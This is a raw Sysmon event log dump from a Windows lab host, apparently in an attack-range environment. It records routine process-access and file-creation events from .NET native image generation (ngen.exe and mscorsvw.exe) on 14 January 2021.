13:25:59.338{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4667-6000-3E04-000000009A01}4200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:59.323{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4667-6000-3E04-000000009A01}4200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:59.323{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4667-6000-3E04-000000009A01}4200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:59.229{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4667-6000-3D04-000000009A01}4576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:59.198{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4667-6000-3D04-000000009A01}4576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:59.198{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4667-6000-3D04-000000009A01}4576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:59.073{08A6967A-4665-6000-3C04-000000009A01}4988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\137c-0\System.Activities.Core.Presentation.dll2021-01-14 13:25:59.073 10341000x80000000000000008368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:02.979{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-466A-6000-4204-000000009A01}4380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:02.963{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-466A-6000-4204-000000009A01}4380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:02.963{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-466A-6000-4204-000000009A01}4380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:02.901{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-466A-6000-4104-000000009A01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:02.901{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-466A-6000-4104-000000009A01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:02.901{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-466A-6000-4104-000000009A01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:02.698{08A6967A-4667-6000-4004-000000009A01}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\139c-0\System.Activities.Presentation.dll2021-01-14 13:26:02.698 10341000x80000000000000008382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:03.635{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-466B-6000-4604-000000009A01}3700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:03.620{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-466B-6000-4604-000000009A01}3700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:03.620{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-466B-6000-4604-000000009A01}3700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:03.557{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-466B-6000-4504-000000009A01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:03.542{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-466B-6000-4504-000000009A01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:03.542{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-466B-6000-4504-000000009A01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:03.479{08A6967A-466B-6000-4404-000000009A01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1174-0\System.AddIn.Contract.dll2021-01-14 13:26:03.479 10341000x80000000000000008375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:03.432{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-466B-6000-4404-000000009A01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:03.417{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-466B-6000-4404-000000009A01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:03.417{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-466B-6000-4404-000000009A01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:03.385{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-466B-6000-4304-000000009A01}3024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:03.370{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-466B-6000-4304-000000009A01}3024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 